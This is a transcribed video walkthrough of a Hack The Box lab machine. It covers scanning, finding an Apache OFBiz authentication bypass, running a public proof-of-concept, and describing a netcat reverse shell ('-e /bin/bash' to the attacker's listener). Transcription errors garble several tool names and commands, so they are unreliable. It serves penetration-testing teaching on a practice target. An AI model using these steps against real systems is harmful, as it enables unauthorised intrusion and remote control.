All right, so I hope you enjoy your over the whatever long weekend. This time I'm gonna do something different. So I'm a strong believer of learn it as you doing it, right? So in order for you to gain the right skill set, you actually have to do the work. So in this case, we are going to attack the hack the box business machine. The very first thing you gotta do is set up a VPN connection. This one is that you can easily do it by go to the website and download the VPN file and make a connection to it. So at this point, I'm not gonna go detail on how to make VPN connection on hack the box, but if you're going to run into trouble, please let me know so I can troubleshoot and work with you. Another thing that you want to focus is that this machine is for hack the box business. So I'll make a here folder business and start to working on it from here. So here's the file. Just kind of want to let you know that then you gotta develop your own style or what do you say, your structure of having your note organized. So for me, I put it as 0 as target information, then put it as 1 as enumeration, 3, 2, initial access, etc. Right? And then if I have more information on target, then I'll cover that later. So for target information, if you go to, as you can see, I already typed it. So I kind of copy and paste the IP address. So first thing I do is that go to target information, IP address as whatever, 10.129.13.40, and this will eventually help us. Very first thing you do is that make sure to ping it, right? Can you connect? Yeah, we are slowly getting the response back, which is not bad. The very next thing I do is that I'm running an mmap usually, right? SB or ports. Usually you do run or ports at the end of the or in the middle of assessment. For the very first time, just run tech sc and tech sv. If you know more about this, those little options, go to man page, which is manual in Linux, right? mmap. Then there will be information. It's sc, tech sc is that script. So there's a bunch of other scripts that you can run in order for you to get more information. And tech sv is like looking for service or version information. So there's that. So what you want to do is that go to mmap sv and out format and map.txt. Usually you can do what's that output format? On, yeah, that's what I usually do. On for decide output format. I usually go for just on and enter. And it'll take some time, so I'm gonna pause. Maybe not. It says ping probe, try the pn. Okay. Let's go to what pn does, right? Oh, yeah, pn is usually for basically when ICMP is blocked on the server or by the target. You can try this to identify what is do host discovery and port scan. Basically skipping host discovery and port scan all target addresses. And it'll run for a while. So I'm gonna pause the video and come back later. So this is taking a lot longer than what I was expecting. So I'm gonna show you one trick while we are doing this. I'm gonna open up a browser and access the web page by the address and let it run for a while. Not really sure why it's taking so long. So on the right hand side, so on the Linux, right, if you click on your Windows key and press arrow key left and right, you can kind of send the main application to wherever location. This is same for Windows. And if you press Windows and up arrow, you can make it bigger. And I accidentally pressed the down button, which will make it smaller or minimize. So it's taking forever. How about this? So as you know, HTTPS is for port 443, which usually is good for what do you say? Accessing secured website, right? Port 443. Let's accept the risk and continue. So the reason why I directly went to using web page is that majority of time, whenever you're doing the testing, right? Majority of time, web applications are run at 80 or 443. Not always the case, right? But when I say majority of time, yeah, many cases, you start with 80 and 443. And the reason why you run a port scanning using mmap is because it'll tell you what other ports are available. And sometimes other ports might have other web application running on site. So you really want to run the mmap port scanning. Basically, at this stage, we are collecting information, right? So majority of case, let's go to canvas, right? You kind of decide to whenever you're doing an assessment. I mean, since it's taking forever, let me go through the some basics, right? When you do assessment, you can do external assessment and internal assessment, right? Usually the definition is varies, but ideally, what it means is that, can I move? No, don't do that. Let's move you. And move, come on, boy. Oh, there you go. So you can do external assessment or internal assessment, meaning that external is that like, can you access the company's web application via public interface, right? Internal assessment is usually means that am I sitting within inside of the organization? Not necessarily like you have direct access, but at least you are behind the company's network access terminal or some kind of firewall out there. So do you have more privilege, right? So if you have kind of identify yourself as the external assessment, you can do open research, right? Go to Shodan or other website to gather more information about the web page, like getting a public information. Internal assessment can be starting with the port scanning and getting more information from via active scannings and whatnot. So those are the two differences you gotta make kind of. Also, when you get hired as a web application tester, usually many times you start as the internal assessor. If you do bug bounty from HackerOne or whatever, then you gotta start with the external assessment, generally speaking. And not really sure why this is taking forever. As you can see, the web address has been changed from the IP to business, right? This case, this is the like DNS. So remember, this website is the hosted by Hack the Box. I don't think I'm explaining this right, but we're gonna edit sudo h host. Right, there we go. No, I gotta beam at the host. Your password. You're gonna edit the IP address, which was, what was it? Let's go back. Obsidian, target information, IP address, and I'm gonna place these. It's the heck the box, right? For now, we're gonna stop here, and then I'm gonna save it, and let's try again. So basically, what it does is that it kind of shows you which website you're gonna go to, right? If you see 10.129.113.40, go to business website. And for whatever reason, this is really taking a long time. Accept. Or maybe put 80. Oh my gosh, this is like speed of the, I don't know what it calls. But this is like extremely slow and unbearable. I might want to choose something different. Okay, so what I did was I stopped scanning, which is a terrible idea because you eventually need the entire information, but the speed of the website is unbearable. Usually what happens is that the company has a load balancer in front of it, meaning that like even if like it has a lot of traffic, the network traffic will be routed to different routes so that users will doesn't have to sacrifice the function the what do you call capability or speed quality. Yeah, but in this case it's just too slow and unbearable, so I had to stop it. So very first thing I'm gonna cover is Nikto, right? Nikto is a web what do you say, web application, what's that, sir, or vulnerability scanning for web. So how you use it is a Nikto .h. You gotta give it the host name and the IP address and let it run. Meanwhile, we're gonna do I'm gonna manually touch the screen, right? So basically, I'm gonna open it up and start to look for vulnerability. Has information, okay, about us, services, and contact, and get started. It doesn't have much information, right? Or here are some certain page you can kind of give it a shot, right? Test at test.com, subject test, and test and send the message and see how this responds. So right now you are acting as regular user and see what it does. You're trying to understand what's going on. It's really funny because Nikto came back as like, dude, I don't know what to do with it. So how about this? Let's keep it run. Phone numbers, email addresses. The very first thing I usually do is that, oh, before we go further, I'm gonna make a note, right? Under use command, I put some information, right? Nikto h post info or FQRN. Is it FQRN or something else? Let's see. FQDN, fully qualified domain name. So gotcha. Where the R came from, right? So as soon as we get rid of the whatever reports, it starts getting more information. And let's see if this one works. HTTP. Seems to me this one is like Firefox is configured in a way that it'll automatically go to 443. So let's undo that, right? Config setting. No. I think about config accept yes, fix a fallback, maybe false. Okay, then let's give it a shot. True. Huh. Redirects to HTTPS. So let's see. Preference, privacy, details, site preference, everything. Network strict. False. Okay. Let's see. Boom. Shit doesn't work. Browser fix support back to HTTPS. Bars. Okay, cool. Alright, I'm not gonna worry about that too much right now. But what I'm gonna worry about is I'm gonna go. So here's the main page, right? We're gonna press Ctrl+U, or we're gonna do view page search, right? And start to go through the source file, right? HTML, as you know, probably HTML is like how you make web application. Within HTML, we can embed JavaScript, PHP, or a bunch of other information so that it'll do more function, but also opens up another more attack vector for us, right? Yeah, so just quickly, right? For HTML, you'll see CSS, which is normally like structure file or formatting file, right? And you're gonna see JavaScripts that usually load it on client side, and make sure you get good cool functions on the web applications. While Nikto is keep running, let's still dig it. So so here's a bunch of links. The reason why links are important is that it shows like what directory it has, right? Heck the box image. There's image directory, and as we explained, there's a CSX directory. Can you go to library? Can you access that, or is it gonna forward back? But it's just taking forever. Oh my gosh, I hate this so much. Image location, image, JPEG, whatever. Here's a main IDs, main, some service information, about us section. Okay, and this is service section, action, facts, contact, and footer. Yeah, I don't see much of good information here yet. Here's a JavaScript main and contact form JavaScript. That's a good information. For now, let's right click, and I don't know what this is, so I'm gonna click it and open it on the side. Okay. Let's see. This is the main.js. jQuery. I don't see much of good information that's in it. Okay, so this one is finished. Whatever. So let's go to Obsidian, right? So we need this information. We ran Nikto and use the method. So so we did the view, or it was that, what is it? View page source, right? One shop to make it bigger. I'm gonna close one view page source, or click what's my call, what's the call, click CTRL+U, right? That's one thing we have done it. And go through JavaScript. So conform, contact form is this. Some kind of regex, right? Wow, whatever. Business pin. The next thing I do is usually first get getting the directory information. So we're gonna do step directory fuzzing, right? So multiple tools are out there, but one easiest thing is that dirsearch, tag U and whatever, and it'll say, oh, we don't have it. Yes, install it please. Password. That's not big at all. Boom. And before we do it, let's save the command. So So while this is running, I'm gonna go to note tool and start to make more notes, right? So one, for use method one, we use the ping command to check if the target is live, right? Then we did use a port scanner to identify or get the port to check open ports, right? So I don't want to insert your intelligence, but port is like when you say port, it's a logical port. So when you look at the Cisco router, you'll have a bunch of port, right? You plug in your Ethernet port to whatever to connect to the router. That is your physical port that is connected to the switch. Here, same concept. This is a logical port. Each target has 1 to 665,535 ports. So 65535, something like that. Has number of ports open. So there's a well-known ports 12024. Those are like the functionality of each ports are kind of like designated, versus afterwards you can kind of decide what to do. But once again, computer is like man-made feature or human-made word, right? So it's kind of pretty much you can name it, or the developers can name it, right? Also use the ports, and then use Nikto to search for vulnerability, and it came back nothing, right? It's timed out. Why? I don't know. Maybe this one. I'll pause for a second. So, not gonna lie, but this is very painful. It's painfully slow. This is kind of expected during your engagement, actual live engagement, but on this one, it is exceptionally slow for the hack the box. Not really sure what's the reason, but we're gonna suck it up. And while we are waiting, let me introduce some more other concepts. So one more thing I usually check is a robots.txt, right? In this case, I guess nothing. Text. So robots.txt is like your go-to stuff, right? Let's see. So it usually shows what is allowed to go for. Sometimes it has good information or not. So robots text. Next thing I do is I usually just put random information, right? So the reason I do that is I want to see what error, if error comes out, what message it has it or not. So let it run, but for whatever reason, I don't think it likes me running multiple stuff, right? So so earlier the reason why it didn't work was that it didn't like the last string trailing /. Okay, better. It's slowly moving. Let's install Foxy-Proxy, right? Go to not you. Go to more tools, extensions for developers. Cool. The very first add-on you're gonna use is that Foxy-Proxy. I thought usually this comes with it, but whatever reason it didn't come with it, so whatever. Here we go. Add. Okay. Where'd it go? Boom. Oh, there you go. Okay. So I'll show you the use case for Foxy-Proxy, and there are a few other web add-ons I want you to add. Next will be web. I don't know how to pronounce this. You know, cool. Next will be cookie something. Cookie Queen Manager. Maybe this one. Or cookie editor. Cookie Quick Manager. So about there, you know. Let's do, okay, allow. Let's see. So we installed 3 extensions, right? One for add-ons, Foxy-Proxy, what's that? Cookie Quick Manager, and last one was wappalyzer. No, just give me the title. Bam, and here we go. All right, so first of all, Foxy-Proxy is like proxy tool for Burp Suite or any other proxy tools. So it goes handy with the Burp Suite. The version we are using is the Community Edition, which is good enough for now. But eventually, when you become a bug hunters or you're gonna do more extensive ones, you can get the pro version. I think it's about $500, and it's a one-time fee, right? You can use it for whatever. It's really good tool, and make sure you familiar with the Burp Suite. Next one is that Cookie Quick Manager. You can kind of see. Let's go to get rid of it. Show you the cookies that the website is using, right? So, my gosh, manage all cookies. Here we go. We have one cookie that is we have one cookie that is J session ID, and the other one is a wrap analyzer. So basically go to, if you click on it, it will show you, I'm okay with that, show you what kind of technology it's using, right? And this is useful for you to kind of make an assumption what technology is behind it. So the idea is that, right, let's go to Canvas again. Girl. So let's go down. Here's your yourself, user that talks to web application, and there's server, right? At the very basic, right? I think this is the 3-tier web application structure, right? You have user connects to web application, and web applications can have data to server. The idea is that boom. The idea is that user should not have access to server. This is being no-go, right? No-go, right? The reason why this is no-go is that the server probably has a lot of information not specific to user, right? It will have information of a lot of different users. So idea is that user should not access the server, and web application should be the only thing that kind of talks to user or getting information input from user and send it to server and come back. So think of a web application as your server, right? So we call this front end and server as back end. So there's that. Boom. it is still running and has accounting information. This is taking forever. Oh my gosh, this is taking longer than I was anticipating. So I'm gonna introduce another tool here, right? But it's really good fuzzing tool. The difference is that dirsearch has slightly easier command, right? Versus ffuf has, you gotta identify what you're gonna fuzz, and you gotta also identify what you want to do, what extensions, times, a whole bunch of things, whole bunch of other 9 yards, right? So another way is that ffuf, you for URL, go to give whatever, and I want to know what's behind our FQDN, right? So let's do fuzz and W whiskey for the word list that we're gonna use. And we usually go for set list. Do I have to the update DB of Kelly locate set lists. So set lists install. So this one is about like 2 gigabytes information. So this is nothing more than your word list from a bunch of locations. So let's go to GitHub and set list. And Daniel and this dude, somehow he has word list for almost everything. So go to here. So think of this as your tool to brute force or enumerate more. More you know about the system, you'll have better idea. And having a good word list is like better than using multiple different tools. There we go. It requires about 2 gigabytes. So if you have enough space, please download. If not, then go to this GitHub web page and download whatever is useful for you. Meanwhile, here it comes in. Adjust the page. So locate set list to the update DB. I think it's over at where it go? Share maybe here. Oh, here we go. So user share. Gotcha. So back here, I'm gonna go to use search share word list. Go to set list. I'm gonna go to discovery, web content, ref, large, directory, the text. And before we go further, I'm gonna stop here and shoot it. And the format is kind of jacked up. That's why you gotta make it bigger and wait. Actually, let's make it small because this is taking forever. Directory, the text, boom. As you the difference was between large and small was the large one, it had about 600 plus, right? 60,000 versus 20,000. So it should be should take less, 1/3 less time, right? Most likely those are false, right? So what you're gonna do is that you're gonna filter that out. I usually filter it out by word, FW1, and I want to make it verbal, and I will copy the description, the syntax for your future use. Obsidian, go to ffuf. Boom. So control is one thing. Cool. Error message. Okay. Apache off bits. So here I'm gonna go to enumeration and web directories, right? One is this one, control main, internal error, control, and I'll let this run. While we're let it run, I'm gonna go search for more information, right? Let's have Obsidian running and Firefox on the accounting control manager, right? Make sure you take a screenshot. Main. No, view image. Next thing will be let's download Flameshot. Yes, Kelly was boom, and go to keyboard. I think shortcut keyboard. Go to shortcut. Go to screenshot. Where the hell are you? Control or print. Okay, we're gonna change this to Flameshot. What's that? Configuration editor. No, I don't want that. Shot. Now I don't want first screenshot. Full launch GUI, capture with GUI. No. Capture launcher. Full. I want to take a screenshot, right? Clipboard. Check. Auto start now. GUI full launcher. Do not accept many arguments. Just opens launch GUI. Okay, so the as you can see, running Flameshot in GUI mode would let the user to select the region from which the screenshot. So Flameshot GUI is what I need. Which Flameshot? Just copy and go to edit and GUI. Okay. Use bam. So let's try. Perfecto. Okay, let me show you what I was doing. So go to here. I'm press the shortcut. For me, it was a print. You can take a screenshot of whatever. And here, just copy and paste to whatever. Here we go, same thing. Right? Awesome. So here it has what does it? I'm gonna try something different. So open a new tab. No, add a new page. New page. New note. That's what it was. So go here. This one will be 1.1 accounting. And then add new note. It will be 1.2. What was the next one? Control. I'm going to copy those accounting to accounting, and control to control. Right now I'm better organized, and meantime I'm gonna check what's in it. Nothing, so I'm gonna go back. Then we're gonna repeat the process, right? How are you gonna do that? Let's go to, oh my gosh, what am I doing? So let's start from the accounting page. Oh, Jesus Christ, I don't know what I'm doing. Obsidian, go to enumeration, target information, and we installed Flameshot, right? Go to page, right? Now we're gonna start taking notes right here. Does admin to admin work? Not, maybe, hopefully. Don't save. One critical information on the bottom, it says, or it'll be easier to read from here. No, it was not. So let's go back. Oh my gosh. What I'm looking at is the version number and the application information for this one. So username, password, hidden, I forgot password, username, time zone. Here's the rainbow stones information, JavaScript, right? Let's go to JavaScript. It has user details and whatever information, not useful, but I think I saw something very useful, a patch of bits. Let's go back, main, and the speed of the, I don't know, this is extremely slow. Oh my gosh. Well, it's loading. I'm gonna go to next page, right? Control. Let's go to control. I don't know what this error exception handling message. So let's identify about. So usually web application has its own error message, very unique. And those very unique error handling message will help us to identify the server informations and whatever. So here it says probably off bits release 22.01, right? So what we know is that it will probably run as Apache off bits, right? Okay, but that doesn't tell us anything, right? Give us more information. Oh my gosh, this is so slow. Oh my gosh. Let's see if we open bits. Okay, hunting manager. There you go. Release. Oh, so here we go. Apache offbids released 18.12. 18.12. Let's go. Counting app info. Let's see if the our add-on caught that, right? Let's go to here, web analyzer. You see, maybe it did not, maybe not. It has not been fully loaded yet. So meanwhile, what we're gonna do is that we're gonna go to here and look for vulnerability, right? So we have web application information. Let's see what vulnerability it has. Release date was December 2023. Okay. That has been stabilized since December 2018. Okay. Let's go to release note. Oh, 4 days ago, the new POC exploit for off bits, right? Maybe a good thing for us. One less work to do, right? Release note, okay. Pre-authenticate RC, okay, due to XML. So release version is that 18.12. Do you have any more information on this? Downloads. Okay. So basically what I'm looking at is that what current version does this have, right? If this one has more than 18.12 or the release number is significantly lower, like 18.11 or 17 something, that means probably this is it has a lot of vulnerability. But looking at this, right, new POC exploit for off bits for vulnerability poses risk to ERP system, right? The vulnerability is here, CVE. So it was fixed in the last month. So this machine was released before last month, I believe. So let's go check it out. GitHub. Bam. Okay. See, some nice people already put in GitHub. So GitHub is like people's go-to place for vulnerability, which is pretty awesome. I love it. I love how people share their idea through websites and whatnot. But here's Python. I think I mentioned earlier, right? You wanna know at least one scripting language, which is probably Python will be a good one to start off with. Python version 3. So here is the just kind of basic structure. Import is the calling libraries from whatever. So import something is basically you're calling everything versus from something, from an import. This is more specific. I just wanna import this specific function or function per se. I don't know what this is. Color is console and def is a defined function. So this is ASCII art, color print red and do this. And we're gonna print this and define another function, detect this information, vulnerable, pong, pass is this one. This is the vulnerable pass basically. So if this is so this is just kind of claiming, or what's the good word? You're saying that vulnerable vulnerable pass is this, and we're gonna try this one. And there's if statement and exception, throw exception, and scan from file. There's this. And should be a main. This is how this Python will be called out, and this is the initializing. Kind of bunch of stuff, but what we're gonna do is that we're gonna give it a shot, right? We're gonna give it a shot and how to use it. So let's see. Let's go to I'm gonna download it, right? Python CVE. And it will say, I don't know what to do. Oh, pip3 install. Right, so you see earlier it has called a bunch of libraries, right? This one I do not have it. So what I did was I basically installed a module named Alive Progress. So we're using pip3 install. Information. pip3 information. Then using wget and see if it runs now. Boom. There we go. URL is business. Boom, coded by K3. Okay. Maybe this full. Or this one. Okay. Maybe it's not running well. Or maybe I'm doing something wrong. So let's check it out. Check out the path. Oh my god. It's still running? Gosh. Stop running. Maybe not this one. Let's try something else. Single URL. Put, okay. Jacko. Oh. Okay. Detection. Let's try this then. Okay. It takes some time. Cool. While it's downloading, right? Let's go back. So what this do is that let's focus on the methodology instead of the technology, right? So what we did was that we basically searched for web application, right? As a user, we did. Let's make it bigger. Come on down. We start off as user. We use mmap to identify which port or manually. Then you get the web application information. Once we got into web application, we are working on to identify which application is running. So as we are getting more information, we kind of make a determination this will be probably vulnerable to certain different items. Within that, we did the open source research, right? We go out there in a Google, look for the vulnerability out there, and we're not sure at this point. We're not sure if this is gonna work or not. So we are downloading different payload. But meanwhile, let's have a better understanding of the CVE that has contained, right? Contained. More information within this analyze and B society. Okay, let's go to B society. Oh, this is a cool website. I like it. There we go. Apache, whatever. Apache Office. There's a video. So the vulnerability will allow attackers to bypass authentication in Apache Office. So basically, authentication bypass. That's a beautiful thing. So here we go. So this one is slightly different, but very similar. Right? One is validating URL. If the URL schema is not something that the URL that we provide is not something that we it was not acceptable, it'll spit out errors here, and it's gonna scan, print, try. You're gonna go to this web page, right? And you're gonna get response. It's gonna request is like a basic Python functionality that kind of deals with URL. We're gonna do message provide a get message, right, within the, let's see, let's try it out. Where's the URL for main? Maybe get rid of main. Need this, I don't need this. Here we go. No, there we go. It comes back with an error. Maybe if he comes back with 400 to 500, it'll raise the status info. If Pong, if it's vulnerable, come back as Pong. Then you're gonna do get encoded payload. Oh, it's using the white source serial. Okay, cool. Cool. Do whatever. Excuse me, I'm sorry. Okay. Let's give it a shot. Python free X detection pi. I gotta put URL. Bum. Not vulnerable. That's a good thing. Control. It's not vulnerable. Go down. Accounting. Maybe not. While I'm gonna go back here. I'm gonna put. Oh no! Give me the payload, buddy. Where's the payload? Here we go. Web tools. Hanging. Let's go to all the way down. Let's see. Boom. Taking longer. Maybe it's a good sign. Maybe not. I don't know. I'll shut this off. And then it's not vulnerable. We're gonna go one layer deeper. This one is not is thinking. Oh my gosh, this is pain in the butt, but it's all good. Actually, this is not the application I look for. Let's go to what's in this X detection thingy. Okay, request oh, maybe it's the same thing. Okay, the scan it. You're gonna go to web tools, controls, web tools, pings, username, require change, yes, false. Okay. Oh, so as we see, it came back. It is vulnerable. So what I did was wrong. I initially thought that this will. Where is it? So the vulnerability or exploit we found is bypassing the username and password login page, right? Since the login page was not very. So what I did was I basically put this information in here as the URL, but it's saying that no, I gotta give the specific URL. So this is just a minor tweak that you gotta do while you're working on it. This is probably because of some kind of web application configuration or the way how vulnerability was written. But anyhow, before we do that, we're gonna go to, since this is vulnerable, we're gonna go here, Python 3 exploit, then URL, put this guy here. No, that's not what I want. Exploit a help URL and command I'm gonna do is the who am I. And let's wait. Check the results of the command. What does that mean? Like, oh, okay, gotcha. So if you send a command to the target, there's a way for us to receive the response, right? For now, if we send a command of who am I, most likely this will not send anything back to us. One way to test it is that sudo trace route interface for net 0. I'm gonna set up the trace route interface tune 0 ICMP, right? Kelly. Trace route to receive ping. What's that command? Oh, I don't know what this is. Ping trace route. Browse syntax to get it's in research. Um, okay. I. Oh, post. Where's the right command? Host, give me host. Okay, maybe what's the URL for this guy? Target information. Boom. No, it's not oh my gosh, what I was doing. Tracing the route is not something. Is it TCP dumb? This is what happens if you are stay away from yeah, it's a TCP dump from command line so long. iTunes 0 ICMP 0. All right, so there we go. Oh my gosh. So let's go TCP dump. I'm gonna go ping. I'm gonna see 3 times the 10.16.26. Boom. Is it gonna work? So basically, I am sending ping command to myself, right? 10.10.16.26. Maybe it's working, maybe not. If not, then we gotta change the tactic a little bit. Why do I have a 2 0? That's interesting. Or okay. Okay, I'm gonna get all ping command. Oh my gosh, it's not working. Oof. All right, so if it doesn't work, I'm gonna tailor this to netcat e bash. What's the netcat? How to set up netcat first shell. Let's see if netcat I can get a netcat. No. IP port e bin bash, right? So IP 10 dot. What's my 10 dot 10 dot? And 16.26. I'm gonna has 9,000 pep e in bash netcat LVP 9,000 and shoot it. Is it gonna work? Bum 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 bum. Is it working? Maybe not. Why not? Is this Windows system? I don't think so. Oh, there you go. Oh, it's just awfully slow. Gosh. Oh, I didn't know that this was this slow. Jesus Christ. So it's been an hour plus on my end, and there's tons of stuff I wanna cover more, but at this point I'm a little tired. So I'm gonna go get the collect the flag and put it in, but I think this is good enough for now for me to move forward. So what we did was we found a open source vulnerability, vulnerability that bypass authentication, which is pretty cool, and we kind of go further from that point. Nice, right? Huh. Yeah, that should be it. Let's see. Meanwhile, there's one more thing I want to show you. Um, for you, there we go. Well, since we have burp up, right? I want to show you how you can use this when this computer start to work again, or the website. My computer is good. Oh, I guess they changed the interface. I don't know what happened, but go to, so click on the here, go to options, go to proxies. No, options. How do I add things? Oh, add title as burp, type as HTTP. You don't need to worry about that. Go to host name as 127.0.0.1. Port number is 8080, and that should be it. I don't want you. I don't know what happened, but their interface is kind of confusing. So go to here, click on burp. No, that's not what you want. Go to here. Let's get the payload here. So I just want to see what's going to happen here. So here, so let's go to burp. It's routing. Go back to burp. Go to proxy tab. Select intercept is off, on. Go back and enter. Let's say, oh my gosh, I don't know what to do. App. Come back here. Yeah, forward it. And let's see, what does it say back? Oh, another thing you gotta do is that go to HTTP burp. No, burp. Forward. I know you. Go to CA certificate, click on it. I'm gonna add it. Close. Wow, it's learning setting certificate, view certificate. Go to, I think, people server, authority import. Go to download, get this, get the CA cert, and trust this website. Click OK and OK, and boom, forward. Well, I was gonna go deep dive into Burp, but maybe this website is not something that we want to use because it's just taking forever. Um, but as you can see, we were able to redirect the network traffic to Burp, so which was nice thing. But next time when you do this, I'm gonna go deep dive into Burp. And meantime, I think it's worth to port Swigger directory search. There we go. Boom. Is there a lab? Swigger directory listing academy. Boom, boom, boom. All labs. Yeah, there we go. Obsidian resources. All labs. Let's see, directory. Yeah, maybe there's no finding. Yeah, maybe not. Yeah, read the directory listing and get familiar with other tools and that we use. Thank you so much for listening. Let me know how I can make your experience or listening experience better, because I may not doing the better job. I may not doing the right job to explain certain things. So if you have questions, please leave a message or whatever. Just contact me, see how that goes. And I gotta learn how to tailor or edit the video. But that's my next job. Next time I'm gonna cover something else with the with this one with the via Hack the Box. So there's that. Have a great week, folks. See you later.